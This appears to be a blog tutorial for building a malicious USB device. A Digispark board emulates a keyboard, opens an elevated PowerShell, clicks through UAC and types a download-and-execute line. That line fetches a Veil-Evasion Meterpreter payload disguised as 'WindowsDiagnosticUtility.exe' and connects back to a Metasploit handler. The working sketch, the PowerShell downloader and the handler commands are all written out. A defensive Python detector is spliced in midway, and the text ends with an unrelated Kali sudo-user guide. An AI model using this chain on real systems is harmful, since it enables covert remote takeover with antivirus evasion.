
Digispark, Powershell, Veil and Metasploit

[Image: Digispark USB Development Board]

Summary

Over the course of this exercise we will build a USB exploit device from a Digispark USB Development board. The requirements are a Kali machine or virtual machine and a Digispark USB Development board.

Split over four parts, we will cover installing Veil-Evasion and creating a custom payload with it, creating our PowerShell downloader, setting up our Metasploit listener, and writing the Digispark script.

Part 1 - Creating the Exploit with Veil-Evasion

Veil-Evasion is a tool for generating payloads that bypass common anti-virus solutions. It isn't available by default in Kali, so our first task is to install it.

root@kali:~# apt-get install veil-evasion

IMPORTANT NOTE: Make sure your first run of Veil-Evasion is from a terminal spawned from a GUI, as the first-run install procedure runs some Wine installers for Python and Ruby.

Now run Veil-Evasion.

root@kali:~# veil-evasion

After the first-run install you will be presented with the menu below.

=========================================================================
 Veil-Evasion | [Version]: 2.28.2
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Main Menu

	51 payloads loaded

 Available Commands:

	use         	Use a specific payload
	info        	Information on a specific payload
	list        	List available payloads
	update      	Update Veil-Evasion to the latest version
	clean       	Clean out payload folders
	checkvt     	Check payload hashes vs. VirusTotal
	exit        	Exit Veil-Evasion

 [menu>>]: list

Type "list" to see all available payloads. For this exercise we will use the c/meterpreter/rev_tcp payload, so enter number "6".

 Payload: c/meterpreter/rev_tcp loaded

 Required Options:

 Name			Current Value	Description
 ----			-------------	-----------
 COMPILE_TO_EXE  	Y       	Compile to an executable
 LHOST           	        	IP of the Metasploit handler
 LPORT           	4444    	Port of the Metasploit handler

 Available Commands:

	set         	Set a specific option value
	info        	Show information about the payload
	options     	Show payload's options
	generate    	Generate payload
	back        	Go to the main menu
	exit        	exit Veil-Evasion

 [c/meterpreter/rev_tcp>>]: 

Now that we have the payload selected, we can view some info and generate it. But first we need to tell the payload where to connect back to: the IP of the listening host. To do this we set the LHOST option with the set command.

 [c/meterpreter/rev_tcp>>]: set LHOST endpoint.testorg.com
 [i] LHOST => endpoint.testorg.com

Running the options command now shows our updated setup. If required you can change the listening port, but be sure to match it when we set up the Metasploit handler later on.

 [c/meterpreter/rev_tcp>>]: options

 Required Options:

 Name			Current Value	Description
 ----			-------------	-----------
 COMPILE_TO_EXE  	Y       	Compile to an executable
 LHOST           	endpoint.testorg.com	IP of the Metasploit handler
 LPORT           	4444    	Port of the Metasploit handler

With the payload's options set, it is time to create the payload. Type "generate" and hit Enter; you will be prompted for a base name. For this test we will use "WindowsDiagnosticUtility" as the base name, since this is how it will show in the Windows Task Manager, and "DansHiddenExploit" would be a bit more obvious. Once done we will have our exe. By default Veil outputs to the folder /var/lib/veil-evasion/output/compiled/.

 [*] Executable written to: /var/lib/veil-evasion/output/compiled/WindowsDiagnosticUtility.exe

 Language:		c
 Payload:		c/meterpreter/rev_tcp
 Required Options:      COMPILE_TO_EXE=Y  LHOST=endpoint.testorg.com
                        LPORT=4444
 Payload File:		/var/lib/veil-evasion/output/source/WindowsDiagnosticUtility.c
 Handler File:		/var/lib/veil-evasion/output/handlers/WindowsDiagnosticUtility_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)

 [>] Press any key to return to the main menu.

If you used a VM to create your payload, you can use shared folders to transfer it to your VM host, or upload it directly to wherever you will later download it from.

Part 2 - Creating the PowerShell downloader

The PowerShell script is very straightforward. It will be fetched and run via Invoke-Expression by the Digispark, so its only purpose is to grab and execute our payload.

$down = New-Object System.Net.WebClient
$url  = 'http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.exe';
$file = 'WindowsDiagnosticUtility.exe';
$down.DownloadFile($url,$file);
$exec = New-Object -com shell.application
$exec.shellexecute($file);

That covers the contents of the file; save it as a .ps1 file and upload it alongside your payload.

This could all be hard-coded into the Digispark; however, by limiting the Digispark's script to typing a single line that fetches this PowerShell downloader, we can update the script and payload later without having to reflash the Digisparks.

Part 3 - Creating the Metasploit Handler

We have our delivery script and we have our payload. Now we need a method of handling the reverse connection generated by our payload.

If you aren't using DNS, this would be the machine to which our payload connects. Back in Part 1 we set the LHOST for our payload to endpoint.testorg.com. For my setup, I use a dynamic DNS name as my LHOST; this is then forwarded through the firewall on the required port (4444 by default) to my handling client.

So let's fire up the Metasploit console.

root@kali:~# msfconsole

       =[ metasploit v4.14.1-dev                         ]
+ -- --=[ 1628 exploits - 927 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Next we want to create our background handler.

msf > use exploit/multi/handler
msf exploit(handler) >  

Select exploit/multi/handler with the use command. Next, set the listening IP and port. Setting LHOST to 0.0.0.0 will listen on all interfaces; you can select a specific interface by supplying its IP address instead.

REMEMBER: If you changed the port when creating the payload be sure to adjust the LPORT value here to match.

msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444

Now we can run the handler in the background. We do this with exploit -j.

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.0.86:4444 
[*] Starting the payload handler...

We can check for connected payloads with sessions -l. At this point there are no connections; we will get to handling and using the connections in the Testing section.

msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

Now we have our handler. Let's set up the delivery USB device.

Part 4 - Coding the Digispark for delivery

Finally, our delivery method. We will cover the setup of the Digispark in a future article and review, but for now you can use the Digistump Wiki (https://digistump.com/wiki/digispark/tutorials/connecting).

So the .ino (Arduino sketch) that we will be using is as follows.

#include "DigiKeyboard.h"

void setup() {
  // Setup LED Outputs
  pinMode(0, OUTPUT); //LED on Model B
  pinMode(1, OUTPUT); //LED on Model A  

  // Get an elevated powershell
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(1000); 
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000); 

  // Invoke Expression of the downloaded ps1 script file.
  DigiKeyboard.print("IEX(New-Object Net.WebClient).DownloadString(@http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.ps1@);");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);

  // Wait a couple of seconds and then exit powershell
  DigiKeyboard.print("exit");
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop() {
  // Flash the LED to say we are done.
  digitalWrite(0, HIGH);   // turn the LED on (HIGH is the voltage level)
  digitalWrite(1, HIGH);
  delay(250);              // wait 250 ms
  digitalWrite(0, LOW);    // turn the LED off by making the voltage LOW
  digitalWrite(1, LOW);
  delay(250);
}

In a nutshell, this sketch emulates a keyboard to open an elevated PowerShell prompt, downloads and executes the PowerShell script we created in Part 2, and then closes the window when it is done.

Now let's take a look at the sketch in more detail. First we include the keyboard header file for the Digispark.

#include "DigiKeyboard.h"

An Arduino sketch has two required functions: setup, which is called once when the device is powered up, and loop, which is called repeatedly once setup completes.

So as we only want the payload to run once, I've bundled the main meat of it into the setup function. This may be at odds with general convention, but it works for me. Now let's dig into the setup function.

These first few lines set up the LED for later use; we will make it blink once the payload is complete.

  // Setup LED Outputs
  pinMode(0, OUTPUT); //LED on Model B
  pinMode(1, OUTPUT); //LED on Model A

Next up we will get ourselves an elevated PowerShell. The following code presses the Windows key (MOD_GUI_LEFT), types "powershell" into the search bar, then presses Ctrl+Shift+Enter to run it as administrator. We then press the left arrow followed by Enter to select Yes on the UAC prompt we are presented with.

  // Get an elevated powershell
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(1000); 
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000); 

With that complete we now have an elevated PowerShell instance, so let's grab and run the PowerShell script we made earlier. We replace double quotes (") with the @ symbol to work around keyboard layout differences on a British English system: DigiKeyboard sends US-layout keystrokes, and the key that produces @ on a US layout produces " on a UK layout. On a US English system you can replace the @ symbol with quotes.

This code types the command to invoke an expression, in this case the text content of our PowerShell script, followed by the Enter key. This downloads the payload and executes it as per the PowerShell script.

  // Invoke Expression of the downloaded ps1 script file.
  DigiKeyboard.print("IEX(New-Object Net.WebClient).DownloadString(@http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.ps1@);");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
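From the defender's side, the IEX line above and the Part 2 downloader both land in PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) as plain text. The following Python is an added example, not part of this article or of any tool it uses: it scores constructed script-block samples against patterns drawn from the article, including the @-quoted URL variant; the rule weights and threshold are this example's own assumptions.

```python
import re

# Constructed sample PowerShell script-block texts (what Event ID 4104 would
# record), modelled on this article's Digispark IEX line (with its @-quoted
# URL), its Part 2 downloader, and two benign administrative commands.
SAMPLE_SCRIPT_BLOCKS = [
    "IEX(New-Object Net.WebClient).DownloadString(@http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.ps1@);",
    'IEX (New-Object Net.WebClient).DownloadString("http://payloads.testorg.com/payloads/WindowsDiagnosticUtility.ps1")',
    "$down = New-Object System.Net.WebClient; $down.DownloadFile($url,$file); "
    "$exec = New-Object -com shell.application; $exec.shellexecute($file);",
    "Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB }",
    "Invoke-WebRequest -Uri https://example.test/report.csv -OutFile report.csv",
]

# (name, pattern, weight). Weights are this example's assumption, not a
# vendor scheme. The URL delimiter is matched loosely because the article
# swaps " for @ to cope with a British keyboard layout.
RULES = [
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("webclient", re.compile(r"Net\.WebClient", re.I), 1),
    ("download_string", re.compile(r"\.DownloadString\s*\(", re.I), 2),
    ("download_file", re.compile(r"\.DownloadFile\s*\(", re.I), 1),
    ("shell_execute", re.compile(r"shell\.application|\.shellexecute\s*\(", re.I), 2),
    ("odd_url_quote", re.compile(r"\(\s*@https?://", re.I), 1),
]


def score_block(text):
    """Return (score, matched rule names) for one script block."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def find_cradles(blocks, threshold=3):
    """Indexes of blocks whose score reaches the threshold (download + execute)."""
    return [i for i, b in enumerate(blocks) if score_block(b)[0] >= threshold]


if __name__ == "__main__":
    for i in find_cradles(SAMPLE_SCRIPT_BLOCKS):
        print(i, score_block(SAMPLE_SCRIPT_BLOCKS[i]))
```

Scoring rather than a single pattern means the @-quoted form, the quoted form and the two-step WebClient/ShellExecute downloader all trip the same rule set while the two benign commands score zero.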

Finally we clean up and close the PowerShell window by calling exit.

  // Wait a couple of seconds and then exit powershell
  DigiKeyboard.delay(2000);
  DigiKeyboard.print("exit");
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

With the setup function complete, the Digispark will execute the loop function. For this exercise all the loop function does is blink the LED we set up in the setup function every half second.

  // Flash the LED to say we are done.
  digitalWrite(0, HIGH);   // turn the LED on (HIGH is the voltage level)
  digitalWrite(1, HIGH);
  delay(250);              // wait 250 ms
  digitalWrite(0, LOW);    // turn the LED off by making the voltage LOW
  digitalWrite(1, LOW);
  delay(250);

With the sketch written, save it and hit the upload button in the Arduino IDE. This builds the sketch and prompts you to plug in the Digispark to finish the upload. Now we have our bad USB device and can move on to testing!

Testing

The testing platform is a Windows 7 VM running on Oracle VirtualBox in bridged networking mode on top of a Windows 10 host, with a Kali laptop on the same network (importantly, however, still using remote PowerShell script hosting, remote payload hosting and the remote IP).

We start up Metasploit on the Kali machine and run the handler in background mode (-j option). Then we insert the USB device into the Windows 7 VM. The Digispark enumerates as a HID device and runs the script, downloading and executing the payload, which opens the Meterpreter connection to the Kali laptop.

From there we are in: we can create persistence with the backdoors, grab screenshots and use the command shell. We are working on a Meterpreter guide with some examples that will elaborate on its usage.

Demonstration Video


Creating a non-root sudo user on Kali

A quick walkthrough on creating a new non-root user on Kali Linux and adding that user to the sudoers. In this brief guide we will add a user called dan and add this user to the sudo group. To get started, open a terminal window and issue the following command.

useradd -m dan 

This adds a new user named dan; the -m option creates a home directory for the user, usually located at /home/dan unless your default home directory location has been changed. Next, let's add a password to the account.

In your terminal window issue the following command.

passwd dan

This will prompt you to enter a password for the newly created user.

Now it's time to add the user to the sudo group. This allows the user to execute commands with root privileges by prefixing the command with sudo and entering their password.

usermod -a -G sudo dan

The -a option tells usermod to append the user to the supplementary group given with -G (here, sudo) without removing them from any groups they are already in; the final argument is the user. Now that we have added the user, set a password and added them to the sudo group, we must specify a login shell for the user.

chsh -s /bin/bash dan

This command changes the user's login shell to the one specified after -s. After this you are all done: log out of root and log in as your newly created user. Any commands or scripts requiring elevation can be executed by prefixing them with sudo and entering the user's password.
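As an added verification step (example code, not part of the original guide), the following Python parses constructed /etc/passwd, /etc/shadow and /etc/group entries and checks the end state the four commands above should leave: the account exists with a home directory, has a usable password, is in the sudo group and uses /bin/bash. The "before" samples are this example's assumption of what useradd -m alone typically leaves on a Debian-based system (locked password, /bin/sh shell).

```python
# Constructed sample entries (not real system files). AFTER_* reflect the
# state the four commands in this guide should leave; BEFORE_* reflect a
# typical Debian/Kali state right after "useradd -m dan" alone: password
# locked ("!") and the default /bin/sh login shell.
BEFORE_PASSWD = "root:x:0:0:root:/root:/bin/bash\ndan:x:1000:1000::/home/dan:/bin/sh\n"
BEFORE_SHADOW = "root:$6$constructed$hash:19000:0:99999:7:::\ndan:!:19000:0:99999:7:::\n"
BEFORE_GROUP = "root:x:0:\nsudo:x:27:\ndan:x:1000:\n"

AFTER_PASSWD = "root:x:0:0:root:/root:/bin/bash\ndan:x:1000:1000::/home/dan:/bin/bash\n"
AFTER_SHADOW = "root:$6$constructed$hash:19000:0:99999:7:::\ndan:$6$constructed$hash:19000:0:99999:7:::\n"
AFTER_GROUP = "root:x:0:\nsudo:x:27:dan\ndan:x:1000:\n"


def parse_colon_file(text):
    """Map the first field of each non-empty line to its remaining fields."""
    rows = {}
    for line in text.splitlines():
        if line.strip():
            name, *fields = line.split(":")
            rows[name] = fields
    return rows


def audit_sudo_user(user, passwd, shadow, group):
    """Return {check: bool} for the account state this guide is meant to produce."""
    pw = parse_colon_file(passwd)
    sh = parse_colon_file(shadow)
    gr = parse_colon_file(group)
    entry = pw.get(user)
    # passwd fields after the name: x, uid, gid, gecos, home, shell
    home = entry[4] if entry else ""
    shell = entry[5] if entry else ""
    # shadow field after the name is the hash; "", "!" or "*" mean unset/locked
    pw_hash = sh.get(user, [""])[0]
    # group fields after the name: x, gid, comma-separated member list
    sudo_members = gr["sudo"][2].split(",") if "sudo" in gr else []
    return {
        "exists": entry is not None,
        "home_dir": home == f"/home/{user}",
        "password_set": bool(pw_hash) and pw_hash[0] not in "!*",
        "in_sudo_group": user in sudo_members,
        "bash_shell": shell == "/bin/bash",
    }


def failing_checks(user, passwd, shadow, group):
    """Names of checks that fail; empty when the account matches the guide."""
    return [k for k, ok in audit_sudo_user(user, passwd, shadow, group).items() if not ok]
```

Run against the real files on a box (reading /etc/shadow requires root) to confirm the account is neither locked nor missing from the sudo group before logging out of root.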